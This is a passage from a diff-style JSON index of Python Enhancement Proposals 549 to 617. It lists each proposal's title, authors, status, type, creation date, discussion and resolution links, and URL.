"Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "04-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0549/" + }, + "550": { + "number": 550, + "title": "Execution Context", + "authors": "Yury Selivanov, Elvis Pranskevichus", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2017", + "python_version": "3.7", + "post_history": "11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017, 01-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0550/" + }, + "551": { + "number": 551, + "title": "Security transparency in the Python runtime", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "23-Aug-2017", + "python_version": "3.7", + "post_history": "24-Aug-2017, 28-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0551/" + }, + "552": { + "number": 552, + "title": "Deterministic pycs", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "07-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149649.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0552/" + }, + "553": { + "number": 553, + "title": "Built-in breakpoint()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Sep-2017, 07-Sep-2017, 13-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/149705.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0553/" + }, + "554": { + "number": 554, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-554-multiple-interpreters-in-the-stdlib/24855", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.13", + "post_history": "`07-Sep-2017 `__, `08-Sep-2017 `__, `13-Sep-2017 `__, `05-Dec-2017 `__, `04-May-2020 `__, `14-Mar-2023 `__, `01-Nov-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "734", + "url": "https://peps.python.org/pep-0554/" + }, + "555": { + "number": 555, + "title": "Context-local variables (contextvars)", + "authors": "Koos Zevenhoven", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Sep-2017", + "python_version": "3.7", + "post_history": "06-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0555/" + }, + "556": { + "number": 556, + "title": "Threaded garbage collection", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0556/" + }, + "557": { + "number": 557, + "title": "Data Classes", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151034.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0557/" + }, + "558": { + "number": 558, + "title": "Defined semantics for locals()", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.13", + "post_history": "08-Sep-2017, 22-May-2019, 30-May-2019, 30-Dec-2019, 18-Jul-2021, 26-Aug-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0558/" + }, + "559": { + "number": 559, + "title": "Built-in noop()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149438.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0559/" + }, + "560": { + "number": 560, + "title": "Core support for typing module and generic types", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017, 14-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151038.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0560/" + }, + "561": { + "number": 561, + "title": "Distributing and Packaging Type Information", + "authors": "Ethan Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging, typing", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0561/" + }, + "562": { + "number": 562, + "title": "Module __getattr__ and __dir__", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0562/" + }, + "563": { + "number": 563, + "title": "Postponed Evaluation of Annotations", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "01-Nov-2017, 21-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151042.html", + "requires": null, + "replaces": null, + "superseded_by": "649", + "url": "https://peps.python.org/pep-0563/" + }, + "564": { + "number": 564, + "title": "Add new time functions with nanosecond resolution", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2017", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/150046.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0564/" + }, + "565": { + "number": 565, + "title": "Show DeprecationWarning in __main__", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2017", + "python_version": "3.7", + "post_history": "12-Nov-2017, 25-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151224.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0565/" + }, + "566": { + "number": 566, + "title": "Metadata for Python Software Packages 2.1", + "authors": "Dustin Ingram", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Dec-2017", + "python_version": "3.x", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-February/032014.html", + "requires": null, + "replaces": "345", + "superseded_by": null, + "url": "https://peps.python.org/pep-0566/" + }, + "567": { + "number": 567, + "title": "Context Variables", + "authors": "Yury Selivanov", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2017", + "python_version": "3.7", + "post_history": "12-Dec-2017, 28-Dec-2017, 16-Jan-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0567/" + }, + "568": { + "number": 568, + "title": "Generator-sensitivity for Context Variables", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0568/" + }, + "569": { + "number": 569, + "title": "Python 3.8 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0569/" + }, + "570": { + "number": 570, + "title": "Python Positional-Only Parameters", + "authors": "Larry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele", + "discussions_to": "https://discuss.python.org/t/pep-570-python-positional-only-parameters/1078", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0570/" + }, + "571": { + "number": 571, + "title": "The manylinux2010 Platform Tag", + "authors": "Mark Williams, Geoffrey Thomas, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "05-Feb-2018", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-April/032156.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0571/" + }, + "572": { + "number": 572, + "title": "Assignment Expressions", + "authors": "Chris Angelico, Tim Peters, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Feb-2018", + "python_version": "3.8", + "post_history": "28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018, 25-Apr-2018, 09-Jul-2018, 05-Aug-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2018-July/154601.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0572/" + }, + "573": { + "number": 573, + "title": "Module State Access from C Extension Methods", + "authors": "Petr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2016", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0573/" + }, + "574": { + "number": 574, + "title": "Pickle protocol 5 with out-of-band data", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2018", + "python_version": "3.8", + "post_history": "28-Mar-2018, 30-Apr-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157284.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0574/" + }, + "575": { + "number": 575, + "title": "Unifying function/method classes", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2018", + "python_version": "3.8", + "post_history": "31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0575/" + }, + "576": { + "number": 576, + "title": "Rationalize Built-in function classes", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "10-May-2018", + "python_version": "3.8", + "post_history": "17-May-2018, 23-Jun-2018, 08-Jul-2018, 29-Mar-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0576/" + }, + "577": { + "number": 577, + "title": "Augmented Assignment Expressions", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-May-2018", + "python_version": "3.8", + "post_history": "22-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0577/" + }, + "578": { + "number": 578, + "title": "Python Runtime Audit Hooks", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2018", + "python_version": "3.8", + "post_history": "28-Mar-2019, 07-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0578/" + }, + "579": { + "number": 579, + "title": "Refactoring C functions and methods", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Jun-2018", + "python_version": null, + "post_history": "20-Jun-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0579/" + }, + "580": { + "number": 580, + "title": "The C call protocol", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jun-2018", + "python_version": "3.8", + "post_history": "20-Jun-2018, 22-Jun-2018, 16-Jul-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0580/" + }, + "581": { + "number": 581, + "title": "Using GitHub Issues for CPython", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/535", + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Jun-2018", + "python_version": null, + "post_history": "07-Mar-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157399.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0581/" + }, + "582": { + "number": 582, + "title": "Python local packages directory", + "authors": "Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "16-May-2018", + "python_version": "3.12", + "post_history": "`01-Mar-2019 `__,", + "resolution": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/430", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0582/" + }, + "583": { + "number": 583, + "title": "A Concurrency Memory Model for Python", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "22-Mar-2008", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0583/" + }, + "584": { + "number": 584, + "title": "Add Union Operators To dict", + "authors": "Steven D'Aprano, Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2019", + "python_version": "3.9", + "post_history": "01-Mar-2019, 16-Oct-2019, 02-Dec-2019, 04-Feb-2020, 17-Feb-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6KT2KIOTYXMDCD2CCAOLOI7LUGTN6MBS", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0584/" + }, + "585": { + "number": 585, + "title": "Type Hinting Generics In Standard Collections", + "authors": "\u0141ukasz Langa", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Mar-2019", + "python_version": "3.9", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/HW2NFOEMCVCTAFLBLC3V7MLM6ZNMKP42/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0585/" + }, + "586": { + "number": 586, + "title": "Literal Types", + "authors": "Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Mar-2019", + "python_version": "3.8", + "post_history": "14-Mar-2019", + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0586/" + }, + "587": { + "number": 587, + "title": "Python Initialization Configuration", + "authors": "Victor Stinner, Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0587/" + }, + "588": { + "number": 588, + "title": "GitHub Issues Migration Plan", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/13791", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Mar-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0588/" + }, + "589": { + "number": 589, + "title": "TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys", + "authors": "Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "20-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0589/" + }, + "590": { + "number": 590, + "title": "Vectorcall: a fast calling protocol for CPython", + "authors": "Mark Shannon, Jeroen Demeyer", + "discussions_to": null, + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0590/" + }, + "591": { + "number": 591, + "title": "Adding a final qualifier to typing", + "authors": "Michael J. Sullivan, Ivan Levkivskyi", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0591/" + }, + "592": { + "number": 592, + "title": "Adding \"Yank\" Support to the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/1629", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "07-May-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-592-support-for-yanked-files-in-the-simple-repository-api/1629/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0592/" + }, + "593": { + "number": 593, + "title": "Flexible function and variable annotations", + "authors": "Till Varoquaux, Konstantin Kashin", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "26-Apr-2019", + "python_version": "3.9", + "post_history": "20-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0593/" + }, + "594": { + "number": 594, + "title": "Removing dead batteries from the standard library", + "authors": "Christian Heimes, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/13508", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-May-2019", + "python_version": "3.11", + "post_history": "21-May-2019, 04-Feb-2022", + "resolution": "https://discuss.python.org/t/13508/22", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0594/" + }, + "595": { + "number": 595, + "title": "Improving bugs.python.org", + "authors": "Ezio Melotti, Berker Peksag", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "12-May-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0595/" + }, + "596": { + "number": 596, + "title": "Python 3.9 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "04-Jun-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0596/" + }, + "597": { + "number": 597, + "title": "Add optional EncodingWarning", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2019", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0597/" + }, + "598": { + "number": 598, + "title": "Introducing incremental feature releases", + "authors": "Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "15-Jun-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0598/" + }, + "599": { + "number": 599, + "title": "The manylinux2014 Platform Tag", + "authors": "Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "29-Apr-2019", + "python_version": null, + "post_history": "29-Apr-2019", + "resolution": "https://discuss.python.org/t/the-next-manylinux-specification/1043/199", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0599/" + }, + "600": { + "number": 600, + "title": "Future 'manylinux' Platform Tags for Portable Linux Built Distributions", + "authors": "Nathaniel J. Smith, Thomas Kluyver", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "03-May-2019", + "python_version": null, + "post_history": "03-May-2019", + "resolution": "https://discuss.python.org/t/pep-600-future-manylinux-platform-tags-for-portable-linux-built-distributions/2414/27", + "requires": null, + "replaces": "513, 571, 599", + "superseded_by": null, + "url": "https://peps.python.org/pep-0600/" + }, + "601": { + "number": 601, + "title": "Forbid return/break/continue breaking out of finally", + "authors": "Damien George, Batuhan Taskaya", + "discussions_to": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2019", + "python_version": "3.8", + "post_history": "26-Aug-2019, 23-Sep-2019", + "resolution": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239/32", + "requires": null, + "replaces": null, + "superseded_by": "765", + "url": "https://peps.python.org/pep-0601/" + }, + "602": { + "number": 602, + "title": "Annual Release Cycle for Python", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-602-annual-release-cycle-for-python/2296/", + "status": "Active", + "type": "Process", + "topic": "", + "created": "04-Jun-2019", + "python_version": "3.9", + "post_history": "`09-Oct-2023 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/KE7OS4PZASZMFTW2FP2MWZU5R4Q2QZKU/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0602/" + }, + "603": { + "number": 603, + "title": "Adding a frozenmap type to collections", + "authors": "Yury Selivanov", + "discussions_to": "https://discuss.python.org/t/pep-603-adding-a-frozenmap-type-to-collections/2318/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2019", + "python_version": null, + "post_history": "12-Sep-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0603/" + }, + "604": { + "number": 604, + "title": "Allow writing union types as ``X | Y``", + "authors": "Philippe PRADOS, Maggie Moss", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2019", + "python_version": "3.10", + "post_history": "28-Aug-2019, 05-Aug-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0604/" + }, + "605": { + "number": 605, + "title": "A rolling feature release stream for CPython", + "authors": "Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-605-a-rolling-feature-release-stream-for-cpython/2418", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "20-Sep-2019", + "python_version": "3.9", + "post_history": "01-Oct-2019, 06-Oct-2019, 20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0605/" + }, + "606": { + "number": 606, + "title": "Python Compatibility Version", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0606/" + }, + "607": { + "number": 607, + "title": "Reducing CPython's Feature Delivery Latency", + "authors": "\u0141ukasz Langa, Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-607-shared-background-for-the-release-cadence-peps/2528", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2019", + "python_version": "3.9", + "post_history": "20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0607/" + }, + "608": { + "number": 608, + "title": "Coordinated Python release", + "authors": "Miro Hron\u010dok, Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0608/" + }, + "609": { + "number": 609, + "title": "Python Packaging Authority (PyPA) Governance", + "authors": "Dustin Ingram, Pradyun Gedam, Sumana Harihareswara", + "discussions_to": "https://discuss.python.org/t/pep-609-pypa-governance/2619", + "status": "Active", + "type": "Process", + "topic": "governance, packaging", + "created": "05-Nov-2019", + "python_version": null, + "post_history": "05-Nov-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0609/" + }, + "610": { + "number": 610, + "title": "Recording the Direct URL Origin of installed distributions", + "authors": "St\u00e9phane Bidoul, Chris Jerdonek", + "discussions_to": "https://discuss.python.org/t/recording-the-source-url-of-an-installed-distribution/1535", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Apr-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/1535/56", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0610/" + }, + "611": { + "number": 611, + "title": "The one million limit", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Dec-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0611/" + }, + "612": { + "number": 612, + "title": "Parameter Specification Variables", + "authors": "Mark Mendoza", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "18-Dec-2019", + "python_version": "3.10", + "post_history": "18-Dec-2019, 13-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0612/" + }, + "613": { + "number": 613, + "title": "Explicit Type Aliases", + "authors": "Shannon Zhu", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/MWRJOBEEEMFVXE7CAKO7B4P46IPM4AN3/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "21-Jan-2020", + "python_version": "3.10", + "post_history": "21-Jan-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0613/" + }, + "614": { + "number": 614, + "title": "Relaxing Grammar Restrictions On Decorators", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2020", + "python_version": "3.9", + "post_history": "11-Feb-2020, 18-Feb-2020, 03-Mar-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VSR66MOTCDCY7ZFH4IG7QVFI2JXQQZQ5", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0614/" + }, + "615": { + "number": 615, + "title": "Support for the IANA Time Zone Database in the Standard Library", + "authors": "Paul Ganssle", + "discussions_to": "https://discuss.python.org/t/3468", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2020", + "python_version": "3.9", + "post_history": "25-Feb-2020, 29-Mar-2020", + "resolution": null, + "requires": null, + "replaces": "431", + "superseded_by": null, + "url": "https://peps.python.org/pep-0615/" + }, + "616": { + "number": 616, + "title": "String methods to remove prefixes and suffixes", + "authors": "Dennis Sweeney", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Mar-2020", + "python_version": "3.9", + "post_history": "20-Mar-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0616/" + }, + "617": { + "number": 617, + "title": "New PEG parser for CPython", + "authors": "Guido van Rossum, Pablo Galindo, Lysandros Nikolaou", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Mar-2020", + "python_version": "3.9", + "post_history": "02-Apr-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0617/" + }, + "618": { + "number": 